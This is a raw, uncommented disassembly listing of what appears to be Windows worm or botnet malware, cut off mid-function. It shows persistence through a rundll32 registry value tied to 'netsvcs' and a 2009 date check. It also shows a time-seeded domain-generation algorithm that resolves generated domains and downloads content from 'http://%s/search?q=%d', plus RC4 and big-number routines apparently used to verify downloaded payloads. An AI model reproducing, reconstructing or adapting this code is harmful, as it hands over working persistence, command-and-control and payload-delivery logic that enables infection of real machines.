sub_9AD71D proc near ; CODE XREF: sub_9A752A+10A�p
Data = byte ptr -220h
var_11D = byte ptr -11Dh
Src = word ptr -11Ch
Dest = word ptr -9Ch
ValueName = byte ptr -1Ch
var_10 = dword ptr -10h
hMem = dword ptr -0Ch
var_8 = dword ptr -8
phkResult = dword ptr -4
lpMultiByteStr = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 220h
push ebx
push edi
push [ebp+74h+lpMultiByteStr] ; Str
xor ebx, ebx
mov [ebp+74h+var_8], ebx
call strlen
mov edi, eax
pop ecx
lea eax, [edi+edi+2]
push eax ; dwBytes
push 40h ; uFlags
mov [ebp+74h+var_10], edi
call GlobalAlloc
cmp eax, ebx
mov [ebp+74h+hMem], eax
jnz short loc_9AD758
xor eax, eax
jmp loc_9AD90D
; ---------------------------------------------------------------------------
loc_9AD758: ; CODE XREF: sub_9AD71D+32�j
push esi
call sub_9AD062
mov esi, rand
mov [ebp+74h+phkResult], eax
call esi ; rand
push 5
pop ecx
cdq
idiv ecx
lea eax, [ebp+74h+Src]
add edx, ecx
push edx
push eax
call sub_9AB677
pop ecx
pop ecx
call esi ; rand
push 10h
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AD7DF
call esi ; rand
push 15h
xor edx, edx
pop ecx
div ecx
mov edi, edx
loc_9AD797: ; CODE XREF: sub_9AD71D+87�j
call esi ; rand
push 15h
xor edx, edx
pop ecx
div ecx
mov ebx, edx
cmp edi, ebx
jz short loc_9AD797
push ds:off_9B9AC8[edi*4] ; Source
lea eax, [ebp+74h+Dest]
push eax ; Dest
call wcscpy
mov edi, wcscat
lea eax, [ebp+74h+Dest]
push offset asc_9A48AC ; " "
push eax ; Dest
call edi ; wcscat
push ds:off_9B9AC8[ebx*4] ; Source
lea eax, [ebp+74h+Dest]
push eax ; Dest
call edi ; wcscat
mov edi, [ebp+74h+var_10]
add esp, 18h
xor ebx, ebx
jmp short loc_9AD7F5
; ---------------------------------------------------------------------------
loc_9AD7DF: ; CODE XREF: sub_9AD71D+6D�j
call esi ; rand
push 5
pop ecx
cdq
idiv ecx
lea eax, [ebp+74h+Dest]
add edx, ecx
push edx
push eax
call sub_9AB677
pop ecx
pop ecx
loc_9AD7F5: ; CODE XREF: sub_9AD71D+C0�j
inc edi
push edi ; cchWideChar
push [ebp+74h+hMem] ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push [ebp+74h+lpMultiByteStr] ; lpMultiByteStr
push ebx ; dwFlags
push ebx ; CodePage
call MultiByteToWideChar
test eax, eax
jz short loc_9AD82C
push [ebp+74h+phkResult] ; int
lea eax, [ebp+74h+Dest]
push offset aNetsvcs ; "netsvcs"
push eax ; lpData
lea eax, [ebp+74h+Src]
push eax ; Src
push [ebp+74h+hMem] ; int
call sub_9AD50E
add esp, 14h
mov [ebp+74h+var_8], eax
loc_9AD82C: ; CODE XREF: sub_9AD71D+EC�j
push [ebp+74h+phkResult] ; Memory
call free
pop ecx
push [ebp+74h+hMem] ; hMem
call GlobalFree
cmp [ebp+74h+var_8], ebx
jnz loc_9AD904
mov eax, ds:dword_9B9F34
xor eax, 0B30AA17Bh
push eax ; Seed
call srand
call esi ; rand
push 5
pop ecx
cdq
idiv ecx
lea eax, [ebp+74h+ValueName]
add edx, ecx
push edx
push eax
call sub_9AB647
call sub_9AB510
push offset aMarnwkcw ; "marnwkcw"
push [ebp+74h+lpMultiByteStr]
lea eax, [ebp+74h+Data]
push offset aRundll32_exe_0 ; "rundll32.exe \"%s\",%s"
push 104h ; Count
push eax ; Dest
call _snprintf
xor edi, edi
add esp, 20h
mov [ebp+74h+var_11D], 0
mov esi, 80000002h
inc edi
loc_9AD8A3: ; CODE XREF: sub_9AD71D+1E5�j
cmp esi, 80000001h
jl short loc_9AD904
push ebx ; lpdwDisposition
lea eax, [ebp+74h+phkResult]
push eax ; phkResult
push ebx ; lpSecurityAttributes
push 20006h ; samDesired
push ebx ; dwOptions
push ebx ; lpClass
push ebx ; Reserved
push offset byte_9A1554 ; lpSubKey
push esi ; hKey
call RegCreateKeyExA
test eax, eax
jnz short loc_9AD8FE
lea eax, [ebp+74h+Data]
push eax ; Str
call strlen
pop ecx
inc eax
push eax ; cbData
lea eax, [ebp+74h+Data]
push eax ; lpData
push edi ; dwType
push ebx ; Reserved
lea eax, [ebp+74h+ValueName]
push eax ; lpValueName
push [ebp+74h+phkResult] ; hKey
call RegSetValueExA
test eax, eax
jnz short loc_9AD8F5
mov [ebp+74h+var_8], edi
loc_9AD8F5: ; CODE XREF: sub_9AD71D+1D3�j
push [ebp+74h+phkResult] ; hKey
call RegCloseKey
loc_9AD8FE: ; CODE XREF: sub_9AD71D+1AA�j
dec esi
cmp [ebp+74h+var_8], ebx
jz short loc_9AD8A3
loc_9AD904: ; CODE XREF: sub_9AD71D+125�j
; sub_9AD71D+18C�j
call sub_9AD00D
mov eax, [ebp+74h+var_8]
pop esi
loc_9AD90D: ; CODE XREF: sub_9AD71D+36�j
pop edi
pop ebx
add ebp, 74h
leave
retn
sub_9AD71D endp
; =============== S U B R O U T I N E =======================================
sub_9AD914 proc near ; CODE XREF: sub_9AD95A+25�p
push ebx
xor ebx, ebx
test esi, esi
jz short loc_9AD956
cmp eax, 200h
jbe short loc_9AD956
push edi
lea edi, [eax-200h]
push edi ; int
push esi ; int
lea eax, [esi+eax-200h]
push eax ; int
push ds:dword_9B9B20 ; int
push offset dword_9B9B28 ; Src
call sub_9AE331
add esp, 14h
test al, al
jz short loc_9AD955
push edi ; nNumberOfBytesToWrite
push esi ; lpBuffer
call sub_9AC396
pop ecx
pop ecx
mov ebx, eax
loc_9AD955: ; CODE XREF: sub_9AD914+34�j
pop edi
loc_9AD956: ; CODE XREF: sub_9AD914+5�j
; sub_9AD914+C�j
mov eax, ebx
pop ebx
retn
sub_9AD914 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AD95A(LPCSTR lpszUrl)
sub_9AD95A proc near ; CODE XREF: sub_9ADCF2+2E�p
var_4 = dword ptr -4
lpszUrl = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
push edi
xor edi, edi
push edi ; int
lea eax, [ebp+var_4]
push eax ; int
push [ebp+lpszUrl] ; lpszUrl
call sub_9ABAC6
mov esi, eax
add esp, 0Ch
cmp esi, edi
jz short loc_9AD98D
mov eax, [ebp+var_4]
cmp eax, edi
jz short loc_9AD986
call sub_9AD914
mov edi, eax
loc_9AD986: ; CODE XREF: sub_9AD95A+23�j
push esi ; hMem
call GlobalFree
loc_9AD98D: ; CODE XREF: sub_9AD95A+1C�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_9AD95A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AD993(LPCSTR lpszUrl, int, int)
sub_9AD993 proc near ; CODE XREF: sub_9ADA6E+1E�p
szAgent = byte ptr -414h
var_413 = byte ptr -413h
var_14 = dword ptr -14h
hInternet = dword ptr -10h
var_C = dword ptr -0Ch
cbSize = dword ptr -8
var_1 = byte ptr -1
lpszUrl = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 414h
push ebx
push edi
xor eax, eax
xor ebx, ebx
mov [ebp+szAgent], bl
mov ecx, 0FFh
lea edi, [ebp+var_413]
rep stosd
stosw
stosb
lea eax, [ebp+cbSize]
push eax ; cbSize
lea eax, [ebp+szAgent]
push eax ; pszUAOut
push ebx ; dwOption
mov [ebp+var_1], bl
mov [ebp+cbSize], 400h
call ObtainUserAgentString
push ebx ; dwFlags
push ebx ; lpszProxyBypass
push ebx ; lpszProxy
push ebx ; dwAccessType
lea eax, [ebp+szAgent]
push eax ; lpszAgent
call InternetOpenA
cmp eax, ebx
mov [ebp+hInternet], eax
jz short loc_9ADA67
push ebx ; dwContext
push 84080300h ; dwFlags
push ebx ; dwHeadersLength
push ebx ; lpszHeaders
push [ebp+lpszUrl] ; lpszUrl
push eax ; hInternet
call InternetOpenUrlA
mov edi, eax
cmp edi, ebx
jz short loc_9ADA5E
push esi
mov esi, HttpQueryInfoA
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+cbSize]
push eax
lea eax, [ebp+var_14]
push eax
push 20000013h
push edi
mov [ebp+var_C], ebx
mov [ebp+cbSize], 4
call esi ; HttpQueryInfoA
test eax, eax
jz short loc_9ADA56
cmp [ebp+var_14], 0C8h
jnz short loc_9ADA56
mov eax, [ebp+arg_8]
mov [ebp+cbSize], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+cbSize]
push eax
push [ebp+arg_4]
mov [ebp+var_C], ebx
push 9
push edi
call esi ; HttpQueryInfoA
test eax, eax
jz short loc_9ADA56
mov [ebp+var_1], 1
loc_9ADA56: ; CODE XREF: sub_9AD993+97�j
; sub_9AD993+A0�j ...
push edi ; hInternet
call InternetCloseHandle
pop esi
loc_9ADA5E: ; CODE XREF: sub_9AD993+6E�j
push [ebp+hInternet] ; hInternet
call InternetCloseHandle
loc_9ADA67: ; CODE XREF: sub_9AD993+56�j
mov al, [ebp+var_1]
pop edi
pop ebx
leave
retn
sub_9AD993 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9ADA6E(LPCSTR lpszUrl, int, int, int)
sub_9ADA6E proc near ; CODE XREF: sub_9ADB52+4D�p
var_408 = dword ptr -408h
var_404 = dword ptr -404h
Str = byte ptr -400h
lpszUrl = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 408h
push ebp
push 400h ; int
lea eax, [esp+410h+Str]
push eax ; int
push [esp+414h+lpszUrl] ; lpszUrl
xor ebp, ebp
mov [esp+418h+var_404], ebp
call sub_9AD993
add esp, 0Ch
test al, al
jz loc_9ADB46
push esi
mov esi, strtok
push edi
mov edi, offset Delim ; ", "
lea eax, [esp+414h+Str]
push edi ; Delim
push eax ; Str
call esi ; strtok
test eax, eax
pop ecx
pop ecx
jz loc_9ADB44
push edi ; Delim
push ebp ; Str
call esi ; strtok
cmp eax, ebp
pop ecx
pop ecx
jz short loc_9ADB44
push ebx
mov ebx, atoi
push eax ; Str
call ebx ; atoi
mov ecx, [esp+41Ch+arg_4]
push edi ; Delim
push ebp ; Str
mov [ecx], ax
call esi ; strtok
mov ebp, eax
add esp, 0Ch
test ebp, ebp
jz short loc_9ADB43
and [esp+418h+var_408], 0
loc_9ADAEB: ; CODE XREF: sub_9ADA6E+A1�j
mov eax, [esp+418h+var_408]
push 3 ; MaxCount
push ebp ; Str
push ds:off_9B9D40[eax*4] ; Str1
call _strnicmp
add esp, 0Ch
test eax, eax
jz short loc_9ADB13
inc [esp+418h+var_408]
cmp [esp+418h+var_408], 0Ch
jb short loc_9ADAEB
jmp short loc_9ADB22
; ---------------------------------------------------------------------------
loc_9ADB13: ; CODE XREF: sub_9ADA6E+96�j
mov eax, [esp+418h+var_408]
mov ecx, [esp+418h+arg_8]
inc eax
mov [ecx], ax
loc_9ADB22: ; CODE XREF: sub_9ADA6E+A3�j
push edi ; Delim
push 0 ; Str
call esi ; strtok
test eax, eax
pop ecx
pop ecx
jz short loc_9ADB43
push eax ; Str
call ebx ; atoi
pop ecx
mov ecx, [esp+418h+arg_C]
mov [ecx], ax
mov [esp+418h+var_404], 1
loc_9ADB43: ; CODE XREF: sub_9ADA6E+76�j
; sub_9ADA6E+BD�j
pop ebx
loc_9ADB44: ; CODE XREF: sub_9ADA6E+47�j
; sub_9ADA6E+55�j
pop edi
pop esi
loc_9ADB46: ; CODE XREF: sub_9ADA6E+28�j
mov eax, [esp+40Ch+var_404]
pop ebp
add esp, 408h
retn
sub_9ADA6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9ADB52 proc near ; CODE XREF: sub_9ADD9B+4E�p
szUrl = byte ptr -38h
var_19 = byte ptr -19h
Dst = word ptr -18h
var_16 = dword ptr -16h
var_12 = dword ptr -12h
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
FileTime = _FILETIME ptr -8
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push 10h ; Size
xor ebx, ebx
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call memset
call rand
push 6
pop ecx
xor edx, edx
div ecx
lea eax, [ebp+szUrl]
push ds:off_9B9D28[edx*4]
push offset aHttpWww_S ; "http://www.%s"
push 20h ; Count
push eax ; Dest
call _snprintf
lea eax, [ebp+Dst]
push eax ; int
lea eax, [ebp+var_16]
push eax ; int
lea eax, [ebp+var_12]
push eax ; int
lea eax, [ebp+szUrl]
push eax ; lpszUrl
mov [ebp+var_19], bl
call sub_9ADA6E
add esp, 2Ch
test eax, eax
jz short loc_9ADBBD
cmp word ptr [ebp+var_12], bx
jz short loc_9ADBBD
cmp word ptr [ebp+var_16], bx
jz short loc_9ADBBD
cmp [ebp+Dst], bx
jnz short loc_9ADBDB
loc_9ADBBD: ; CODE XREF: sub_9ADB52+57�j
; sub_9ADB52+5D�j ...
lea eax, [ebp+Dst]
push eax ; lpSystemTime
call GetSystemTime
mov word ptr [ebp+var_16+2], bx
mov word ptr [ebp+var_12+2], bx
mov [ebp+var_A], bx
mov [ebp+var_E], bx
mov [ebp+var_C], bx
loc_9ADBDB: ; CODE XREF: sub_9ADB52+69�j
lea eax, [ebp+FileTime]
push eax ; lpFileTime
lea eax, [ebp+Dst]
push eax ; lpSystemTime
call SystemTimeToFileTime
push 3
push 52C94565h
push [ebp+FileTime.dwHighDateTime]
push [ebp+FileTime.dwLowDateTime]
call __allmul
push 580h
push 28E44000h
push edx
push eax
call __aulldiv
add eax, 0A3596526h
adc edx, ebx
mov dword ptr ds:dbl_9B9D90, eax
mov dword ptr ds:dbl_9B9D90+4, edx
pop ebx
leave
retn
sub_9ADB52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9ADC21 proc near ; CODE XREF: sub_9ADD9B+78�p
; sub_9ADD9B+97�p ...
var_30 = qword ptr -30h
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 20h
mov ecx, dword ptr ds:dbl_9B9D90+4
mov eax, dword ptr ds:dbl_9B9D90
and dword ptr [ebp+var_8], 0
push esi
mov edx, ecx
push edi
mov dword ptr [ebp+var_8+4], edx
mov edi, 7FFFFFFFh
and edx, edi
mov dword ptr [ebp+var_10], eax
mov dword ptr [ebp+var_10+4], edx
fild [ebp+var_10]
mov esi, 80000000h
and dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
and dword ptr [ebp+var_8], 0
mov dword ptr [ebp+var_8+4], ecx
and dword ptr [ebp+var_8+4], esi
fchs
and ecx, edi
faddp st(1), st
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], ecx
push ecx
fstp [ebp+var_10]
push ecx
fild [ebp+var_18]
fild [ebp+var_8]
fchs
faddp st(1), st
fstp [esp+30h+var_30]
call sin
add esp, 8
fstp [ebp+var_20]
push 0
push 53125624h
push dword ptr ds:dbl_9B9D90+4
push dword ptr ds:dbl_9B9D90
call __allmul
and dword ptr [ebp+var_8], 0
mov dword ptr [ebp+var_8+4], edx
and dword ptr [ebp+var_8+4], esi
and edx, edi
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
fild [ebp+var_8]
push ecx
fchs
faddp st(1), st
fadd [ebp+var_20]
fmul [ebp+var_10]
fadd ds:dbl_9A4950
fmul [ebp+var_10]
fstp [ebp+var_20]
fld [ebp+var_10]
fstp [esp+30h+var_30]
call log
fadd [ebp+var_20]
pop ecx
pop ecx
pop edi
fstp ds:dbl_9B9D90
mov eax, dword ptr ds:dbl_9B9D90
pop esi
leave
retn
sub_9ADC21 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9ADCF2(LPVOID)
sub_9ADCF2 proc near ; DATA XREF: sub_9ADD49+32�o
szUrl = byte ptr -80h
var_1 = byte ptr -1
Memory = dword ptr 8
push ebp
mov ebp, esp
sub esp, 80h
push ds:dword_9B9F38
lea eax, [ebp+szUrl]
push [ebp+Memory]
push offset aHttpSSearch?qD ; "http://%s/search?q=%d"
push 80h ; Count
push eax ; Dest
call _snprintf
lea eax, [ebp+szUrl]
push eax ; lpszUrl
mov [ebp+var_1], 0
call sub_9AD95A
add esp, 18h
test eax, eax
jz short loc_9ADD39
push 1 ; Value
push offset dword_9BA288 ; Target
call InterlockedExchange
loc_9ADD39: ; CODE XREF: sub_9ADCF2+38�j
push [ebp+Memory] ; Memory
call free
pop ecx
xor eax, eax
leave
retn 4
sub_9ADCF2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9ADD49(LPVOID)
sub_9ADD49 proc near ; DATA XREF: sub_9ADD9B+161�o
ThreadId = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+ThreadId]
push esi ; name
call gethostbyname
test eax, eax
jz short loc_9ADD91
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax] ; in
call inet_ntoa
test eax, eax
jz short loc_9ADD91
lea ecx, [ebp+ThreadId]
push ecx ; lpThreadId
push 0 ; dwCreationFlags
push eax ; Src
call _strdup
pop ecx
push eax ; lpParameter
push offset sub_9ADCF2 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
loc_9ADD91: ; CODE XREF: sub_9ADD49+10�j
; sub_9ADD49+21�j
mov byte ptr [esi], 0
xor eax, eax
pop esi
pop ebp
retn 4
sub_9ADD49 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9ADD9B proc near ; CODE XREF: StartAddress+1FA�p
lpParameter = dword ptr -488h
var_A0 = dword ptr -0A0h
Handles = dword ptr -78h
var_50 = dword ptr -50h
ThreadId = dword ptr -4Ch
var_48 = dword ptr -48h
SystemTime = _SYSTEMTIME ptr -44h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 478h
push offset stru_9A4970
call __SEH_prolog
push 0Ah
pop eax
cmp eax, ds:dword_9B9E20
sbb esi, esi
and esi, 9
inc esi
mov [ebp+var_2C], esi
xor edi, edi
mov [ebp+ms_exc.disabled], edi
lea eax, [ebp+SystemTime]
push eax ; lpSystemTime
call GetSystemTime
cmp [ebp+SystemTime.wYear], 7D9h
ja short loc_9ADDE4
jnz loc_9ADFB3
cmp [ebp+SystemTime.wMonth], 1
jb loc_9ADFB3
loc_9ADDE4: ; CODE XREF: sub_9ADD9B+36�j
call sub_9AB510
call sub_9ADB52
mov ds:dword_9BA288, edi
loc_9ADDF4: ; CODE XREF: sub_9ADD9B+DC�j
mov [ebp+var_1C], edi
mov ebx, 0FAh
cmp edi, ebx
jnb short loc_9ADE7C
push 20h ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov ebx, eax
mov [ebp+edi*4+lpParameter], ebx
call sub_9ADC21
cdq
push 4
pop ecx
idiv ecx
mov esi, edx
add esi, 8
mov [ebp+var_34], esi
mov [ebp+var_48], ebx
and [ebp+var_28], 0
loc_9ADE2D: ; CODE XREF: sub_9ADD9B+B5�j
cmp [ebp+var_28], esi
jnb short loc_9ADE52
call sub_9ADC21
push eax ; X
call labs
pop ecx
cdq
push 1Ah
pop ecx
idiv ecx
add edx, 61h
mov eax, [ebp+var_28]
mov [eax+ebx], dl
inc [ebp+var_28]
jmp short loc_9ADE2D
; ---------------------------------------------------------------------------
loc_9ADE52: ; CODE XREF: sub_9ADD9B+95�j
mov byte ptr [ebx+esi], 0
call sub_9ADC21
and eax, 7
push ds:off_9B9D70[eax*4] ; Source
push [ebp+edi*4+lpParameter] ; Dest
call strcat
pop ecx
pop ecx
inc edi
mov esi, [ebp+var_2C]
jmp loc_9ADDF4
; ---------------------------------------------------------------------------
loc_9ADE7C: ; CODE XREF: sub_9ADD9B+63�j
mov [ebp+var_30], 1
loc_9ADE83: ; CODE XREF: sub_9ADD9B+1E5�j
; sub_9ADD9B+1EF�j
xor edi, edi
cmp [ebp+var_30], edi
jz loc_9ADF8F
cmp ds:dword_9BA288, edi
jnz loc_9ADF8F
loc_9ADE9A: ; CODE XREF: sub_9ADD9B+17D�j
mov [ebp+var_1C], edi
cmp edi, esi
jnb short loc_9ADF1F
loc_9ADEA1: ; CODE XREF: sub_9ADD9B+139�j
; sub_9ADD9B+151�j
call rand
cdq
mov ecx, ebx
idiv ecx
mov esi, edx
mov [ebp+var_50], esi
xor eax, eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
loc_9ADEB9: ; CODE XREF: sub_9ADD9B+182�j
cmp [ebp+var_20], edi
jnb short loc_9ADED1
mov ecx, [ebp+var_20]
cmp [ebp+ecx*4+var_A0], esi
jnz short loc_9ADF1A
mov [ebp+var_24], 1
loc_9ADED1: ; CODE XREF: sub_9ADD9B+121�j
cmp [ebp+var_24], eax
jnz short loc_9ADEA1
mov ecx, [ebp+esi*4+lpParameter]
cmp byte ptr [ecx], 0
jnz short loc_9ADEE9
mov [ebp+var_24], 1
loc_9ADEE9: ; CODE XREF: sub_9ADD9B+145�j
cmp [ebp+var_24], eax
jnz short loc_9ADEA1
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
xor eax, eax
push eax ; dwCreationFlags
push [ebp+esi*4+lpParameter] ; lpParameter
push offset sub_9ADD49 ; lpStartAddress
push eax ; dwStackSize
push eax ; lpThreadAttributes
call CreateThread
mov [ebp+edi*4+Handles], eax
mov [ebp+edi*4+var_A0], esi
inc edi
mov esi, [ebp+var_2C]
jmp short loc_9ADE9A
; ---------------------------------------------------------------------------
loc_9ADF1A: ; CODE XREF: sub_9ADD9B+12D�j
inc [ebp+var_20]
jmp short loc_9ADEB9
; ---------------------------------------------------------------------------
loc_9ADF1F: ; CODE XREF: sub_9ADD9B+104�j
push 7530h ; dwMilliseconds
push 1 ; bWaitAll
lea eax, [ebp+Handles]
push eax ; lpHandles
push esi ; nCount
call WaitForMultipleObjects
and [ebp+var_1C], 0
loc_9ADF35: ; CODE XREF: sub_9ADD9B+1BE�j
cmp [ebp+var_1C], esi
jnb short loc_9ADF5B
mov esi, [ebp+var_1C]
lea esi, [ebp+esi*4+Handles]
push 0 ; dwExitCode
push dword ptr [esi] ; hThread
call TerminateThread
push dword ptr [esi] ; hObject
call CloseHandle
inc [ebp+var_1C]
mov esi, [ebp+var_2C]
jmp short loc_9ADF35
; ---------------------------------------------------------------------------
loc_9ADF5B: ; CODE XREF: sub_9ADD9B+19D�j
push 1388h ; dwMilliseconds
call Sleep
xor eax, eax
loc_9ADF68: ; CODE XREF: sub_9ADD9B+1E1�j
mov [ebp+var_1C], eax
cmp eax, ebx
jnb short loc_9ADF86
mov ecx, [ebp+eax*4+lpParameter]
cmp byte ptr [ecx], 0
jnz short loc_9ADF7E
inc eax
jmp short loc_9ADF68
; ---------------------------------------------------------------------------
loc_9ADF7E: ; CODE XREF: sub_9ADD9B+1DE�j
cmp eax, ebx
jb loc_9ADE83
loc_9ADF86: ; CODE XREF: sub_9ADD9B+1D2�j
and [ebp+var_30], 0
jmp loc_9ADE83
; ---------------------------------------------------------------------------
loc_9ADF8F: ; CODE XREF: sub_9ADD9B+ED�j
; sub_9ADD9B+F9�j
mov [ebp+var_1C], edi
loc_9ADF92: ; CODE XREF: sub_9ADD9B+20F�j
cmp [ebp+var_1C], ebx
jnb short loc_9ADFB3
mov eax, [ebp+var_1C]
push [ebp+eax*4+lpParameter] ; hMem
call GlobalFree
inc [ebp+var_1C]
jmp short loc_9ADF92
; ---------------------------------------------------------------------------
loc_9ADFAC: ; DATA XREF: .text:stru_9A4970�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9ADFB0: ; DATA XREF: .text:stru_9A4970�o
mov esp, [ebp+ms_exc.old_esp]
loc_9ADFB3: ; CODE XREF: sub_9ADD9B+38�j
; sub_9ADD9B+43�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_9ADD9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9ADFBD proc near ; CODE XREF: sub_9AE06F+16�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor edx, edx
mov [eax], edx
mov [eax+4], edx
xor ecx, ecx
loc_9ADFCC: ; CODE XREF: sub_9ADFBD+1A�j
mov [eax+ecx*4+8], ecx
inc ecx
cmp ecx, 100h
jl short loc_9ADFCC
push ebx
push esi
push edi
xor esi, esi
mov [ebp+arg_0], edx
loc_9ADFE1: ; CODE XREF: sub_9ADFBD+56�j
mov ecx, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov bl, [esi+ebx]
add bl, dl
lea edi, [eax+ecx*4+8]
mov ecx, [edi]
add bl, cl
movzx edx, bl
mov ebx, [eax+edx*4+8]
inc esi
cmp esi, [ebp+arg_8]
mov [edi], ebx
mov [eax+edx*4+8], ecx
jl short loc_9AE009
xor esi, esi
loc_9AE009: ; CODE XREF: sub_9ADFBD+48�j
inc [ebp+arg_0]
cmp [ebp+arg_0], 100h
jl short loc_9ADFE1
pop edi
pop esi
pop ebx
pop ebp
retn
sub_9ADFBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AE01A proc near ; CODE XREF: sub_9AE06F+28�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ebx
mov ebx, [eax]
push edi
xor edi, edi
cmp [ebp+arg_8], edi
jle short loc_9AE066
push esi
loc_9AE02F: ; CODE XREF: sub_9AE01A+49�j
inc bl
movzx ebx, bl
mov edx, [eax+ebx*4+8]
add cl, dl
movzx ecx, cl
lea esi, [eax+ecx*4+8]
mov [ebp+arg_0], ecx
mov ecx, [esi]
mov [eax+ebx*4+8], ecx
add cl, dl
mov [esi], edx
mov esi, [ebp+arg_4]
movzx ecx, cl
mov cl, [eax+ecx*4+8]
add esi, edi
xor [esi], cl
mov ecx, [ebp+arg_0]
inc edi
cmp edi, [ebp+arg_8]
jl short loc_9AE02F
pop esi
loc_9AE066: ; CODE XREF: sub_9AE01A+12�j
pop edi
mov [eax], ebx
mov [eax+4], ecx
pop ebx
pop ebp
retn
sub_9AE01A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AE06F proc near ; CODE XREF: sub_9AE331+98�p
; sub_9AEFDD+4C�p ...
var_408 = byte ptr -408h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 408h
push [ebp+arg_C]
lea eax, [ebp+var_408]
push [ebp+arg_8]
push eax
call sub_9ADFBD
push [ebp+arg_4]
lea eax, [ebp+var_408]
push [ebp+arg_0]
push eax
call sub_9AE01A
add esp, 18h
leave
retn
sub_9AE06F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AE0A1 proc near ; CODE XREF: sub_9AE0FB+3E�p
; sub_9AE0FB+94�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
mov ecx, 80h
loc_9AE0B2: ; CODE XREF: sub_9AE0A1+1E�j
mov eax, [esi+ecx*4]
mov ebx, [edi+ecx*4]
cmp eax, ebx
jb short loc_9AE0C5
ja short loc_9AE0CC
dec ecx
jns short loc_9AE0B2
xor eax, eax
jmp short loc_9AE0D1
; ---------------------------------------------------------------------------
loc_9AE0C5: ; CODE XREF: sub_9AE0A1+19�j
mov eax, 0FFFFFFFFh
jmp short loc_9AE0D1
; ---------------------------------------------------------------------------
loc_9AE0CC: ; CODE XREF: sub_9AE0A1+1B�j
mov eax, 1
loc_9AE0D1: ; CODE XREF: sub_9AE0A1+22�j
; sub_9AE0A1+29�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_9AE0A1 endp
; =============== S U B R O U T I N E =======================================
sub_9AE0D6 proc near ; CODE XREF: sub_9AE0FB+13�p
; sub_9AE1BE+38�p
arg_0 = dword ptr 4
mov eax, 101Fh
push esi
loc_9AE0DC: ; CODE XREF: sub_9AE0D6+1F�j
mov esi, [esp+4+arg_0]
mov edx, eax
shr edx, 5
mov edx, [esi+edx*4]
mov ecx, eax
and ecx, 1Fh
shr edx, cl
test dl, 1
jnz short loc_9AE0F9
dec eax
jns short loc_9AE0DC
xor eax, eax
loc_9AE0F9: ; CODE XREF: sub_9AE0D6+1C�j
pop esi
retn
sub_9AE0D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AE0FB(void *Dst, int, int)
sub_9AE0FB proc near ; CODE XREF: sub_9AE1BE+74�p
; sub_9AE1BE+A1�p
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 204h ; Size
push 0 ; Val
push [ebp+Dst] ; Dst
call memset
push ebx
call sub_9AE0D6
mov edx, eax
add esp, 10h
test edx, edx
jl loc_9AE1BC
push esi
push edi
loc_9AE122: ; CODE XREF: sub_9AE0FB+B9�j
mov edi, [ebp+Dst]
xor eax, eax
mov ecx, 81h
